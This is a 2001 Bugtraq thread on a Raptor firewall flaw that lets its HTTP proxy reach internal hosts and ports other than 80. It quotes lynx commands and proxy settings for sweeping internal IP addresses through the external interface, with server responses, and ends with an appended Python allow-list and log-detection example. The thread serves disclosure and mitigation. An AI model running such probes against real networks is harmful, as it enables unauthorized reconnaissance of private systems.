Bugtraq mailing list archives
Re: Raptor 6.5 http vulnerability
From: Lysel Christian Emre <chlys () WMDATA COM>
Date: Mon, 26 Mar 2001 22:34:30 +0200
Note, the patch can be downloaded from (for the international version): ftp://ftp.axent.com/pub/RaptorFirewall/International/Patches/NT6.5/
From: Alexander Bochmann [mailto:ab () gxis de]

> > 1. Problem Description
> > The Raptor firewall is vulnerable to forwarding http
> > requests on other port numbers than 80, if a rule allows http
> > traffic.
> > When an external or internal client configures itself to use
> > the nearest interface as proxy, it's possible to access other
> > ports than 80 on the target host.
> >
> > 2.1 Non Vulnerable Versions
> > Raptor firewall 6.0.2.
>
> Depending on the configuration and on how you try it, 6.0.2 also seems to be vulnerable.

We have not noticed this.

> I already noticed some months ago that the Raptor (6.0.2) firewall's http gateway possibly leaks information about an internal network with the method you described, if redirected services are used.

It does not leak information about the internal network. The Apache webserver can leak information from error pages:

    .....
    Internal Server Error
    The server encountered an internal error or misconfiguration and was unable to complete your request.
    Please contact the server administrator, <email of webmaster> and inform them of the time the error occurred, and anything you might have done that may have caused the error.
    More information about this error may be available in the server error log.
    --------------------------------------------------------------------------------
    Apache/1.3.9 Server at <hostname> Port <port>
    .......

> It's possible to brute-force IP addresses used on a DMZ network: If you use the http gateway on the external interface as proxy, you can access internal IPs (and internal DNS names) directly - just try them all ;)

This should generate some logs! And can also be blocked by: http.urlpattern

> Example:
>
> setenv http_proxy http://external.firewall.name:80/
>
> Now go on with something like...
>
> lynx -mime_header http://192.168.95.1:80/
>
> ...you will either get 403 or 503 errors from the gateway (depending on its configuration) for the destination:
>
> lynx -mime_header http://192.168.95.2:80/

This is the internal interface for the firewall, right?

> HTTP/1.1 503 Service Unavailable
> MIME-Version: 1.0
> Server: Simple, Secure Web Server 1.1
> Date: Mon, 26 Mar 2001 14:59:29 GMT
> Connection: close
> Content-Type: text/html
> [.. etc ..]
>
> ...or, if you are lucky, an answer from a web server:
>
> % lynx -mime_header http://192.168.95.74:80/

And this is a request to the webserver? http.remove-header should remove the headers :)

> HTTP/1.1 200 OK
> Date: Mon, 26 Mar 2001 14:43:19 GMT
> Server: Apache/1.3.17 (Unix) mod_perl/1.24_01 PHP/3.0.18
> Last-Modified: Thu, 15 Feb 2001 08:23:04 GMT
> Accept-Ranges: bytes
> Content-Length: 2490
> Connection: close
> Content-Type: text/html
>
> <!doctype html public "-//IETF//DTD HTML//EN">
> [.. etc ..]
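As an added example (not part of this thread and not Raptor's own code), the two defensive points raised in the exchange in Python: an allow-list on the destinations a proxy request may be forwarded to, in the spirit of the http.urlpattern setting, denying private addresses and ports other than 80; and a pass over gateway log lines that picks out clients sweeping several internal destinations through the external-interface proxy. The allow-listed host, the log line format and the client addresses are constructed for the illustration and do not describe the Raptor log format.

```python
import ipaddress
from collections import defaultdict
from urllib.parse import urlsplit

# Destinations the gateway on the external interface may forward to.
# Hypothetical values standing in for an http.urlpattern-style allow-list.
ALLOWED_HOSTS = {"www.example.com"}
ALLOWED_PORTS = {80}


def parse_proxy_target(request_line):
    """Return (host, port) for an absolute-URI proxy request line such as
    'GET http://192.168.95.74:80/ HTTP/1.0', or None for anything else."""
    parts = request_line.split()
    if len(parts) != 3:
        return None
    _method, target, _version = parts
    if "://" not in target:
        return None  # origin-form request (GET /path), not a proxy request
    u = urlsplit(target)
    if u.scheme != "http" or not u.hostname:
        return None
    try:
        return u.hostname, u.port or 80
    except ValueError:  # malformed port such as http://host:abc/
        return None


def is_private_host(host):
    """True when the destination is a private, loopback or link-local address."""
    try:
        return ipaddress.ip_address(host).is_private
    except ValueError:
        return False  # a DNS name; name resolution is out of scope here


def allow_proxy_request(request_line):
    """Policy check returning (allowed, reason): private destinations, ports
    other than 80 and hosts outside the allow-list are refused."""
    target = parse_proxy_target(request_line)
    if target is None:
        return False, "not an absolute-URI proxy request"
    host, port = target
    if is_private_host(host):
        return False, "private destination %s" % host
    if port not in ALLOWED_PORTS:
        return False, "port %d not permitted" % port
    if host not in ALLOWED_HOSTS:
        return False, "host %s not in allow-list" % host
    return True, "ok"


# Constructed gateway log lines in the form "<client> <method> <target> <status>".
SAMPLE_LOG = [
    "203.0.113.5 GET http://192.168.95.1:80/ 503",
    "203.0.113.5 GET http://192.168.95.2:80/ 503",
    "203.0.113.5 GET http://192.168.95.74:80/ 200",
    "198.51.100.9 GET http://www.example.com/ 200",
    "198.51.100.9 GET http://www.example.com/index.html 200",
]


def find_probing_clients(lines, min_targets=2):
    """Return clients that asked the gateway for at least min_targets distinct
    private (host, port) destinations: the sweep pattern the thread describes."""
    hits = defaultdict(set)
    for line in lines:
        fields = line.split()
        if len(fields) != 4:
            continue  # skip lines that do not match the constructed format
        client, method, target, _status = fields
        parsed = parse_proxy_target("%s %s HTTP/1.0" % (method, target))
        if parsed and is_private_host(parsed[0]):
            hits[client].add(parsed)
    return sorted(c for c, t in hits.items() if len(t) >= min_targets)


if __name__ == "__main__":
    for req in ("GET http://www.example.com/ HTTP/1.0",
                "GET http://192.168.95.74:80/ HTTP/1.0",
                "GET http://www.example.com:8080/ HTTP/1.0"):
        print(req, "->", allow_proxy_request(req))
    print("probing clients:", find_probing_clients(SAMPLE_LOG))
```

The policy check refuses private destinations before consulting the allow-list, so a host that is both internal and allow-listed still cannot be reached from the outside interface; the log pass counts distinct internal destinations per client rather than raw request volume, so a single mistyped URL does not trigger it while the incremental sweep shown above does.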